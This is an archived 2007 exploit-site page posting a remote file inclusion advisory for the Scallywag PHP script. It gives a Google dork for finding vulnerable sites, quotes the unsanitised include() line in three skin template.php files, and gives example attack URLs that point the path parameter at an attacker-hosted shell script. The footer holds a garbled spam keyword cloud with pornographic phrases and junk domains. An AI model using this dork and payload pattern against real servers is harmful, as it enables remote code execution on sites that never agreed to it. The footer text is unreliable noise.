about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Scallywag (template.php path) Remote File Inclusion Vulnerabilities



2007-05-23 Scallywag (template.php path) Remote File Inclusion Vulnerabilities
Rated as : Moderate Risk

##############################################################################################
#Scallywag  <=  Remote File Inclusion Vulnerability                    
                     #
#                                                                         
                  # 
#Dork:"Powered by Scallywag"                                    
                            #
#                                                                         
                  #
#                                                                         
                  # 
##############################################################################################
#Vuln Code                                                                
                  #  
#                                                                         
                  # 
#ERROR1:skin/dark/template.php                                            
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     # 
#                                                                         
                  # 
#                                                                         
                  # 
#BUG1:                                                                    
                  # 
#                                                                         
                  # 
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL
Script]]                #
##############################################################################################

#                                                                         
                  # 
#ERROR2:skin/gold/template.php                                            
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     # 
#                                                                         
                  # 
#                                                                         
                  # 
#BUG2:                                                                    
                  # 
#                                                                         
                  # 
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL
Script]]                #
##############################################################################################
#                                                                         
                  # 
#ERROR3:skin/original/template.php                                        
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     #
#                                                                         
                  # 
#                                                                         
                  # 
#BUG3:                                                                    
                  # 
#                                                                         
                  # 
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL
Script]]           #
##############################################################################################
#                                                                         
                  # 
#Script Download                                                          
                  # 
##############################################################################################
#                                                                         
                  # 
#http://www.woweb.ru/load/82-1-0-3791                                     
                  # 
#                                                                         
                  # 
##############################################################################################

#                                                                         
                  # 
#Cyber-Security                                                           
                  # 
#                                                                         
                  # 
##############################################################################################
##############################################################################################
securitydot.net - 2007-05-23

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 03:13:45 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
extreme Www.thaise Worm.Restu Phone erot xmlrp c speedport www.okquhe www.xxsz.n nzyy120.co pohot Girl sex i www.fcd518 www.newszx hot sexy g OpenSSL Ba xmlrp c Invision P free sex f bbs.it22.c School gir WWW.XXXX C red yube v www.Freese School gir www.kdhz.c t105t c exploits booliwoods Video kama 04-012 Invision P www.qhywj. www.lv87.c Dfind.exe forum file %...ins/sa www.lv87.c 98wo.com ss naruto key no.800 www.od88.c sex viedo. news for C Netop scho Exploits S www.98wo.c www.6m6m.c www.it22.c dfsfgsdfsd www.mbtxzx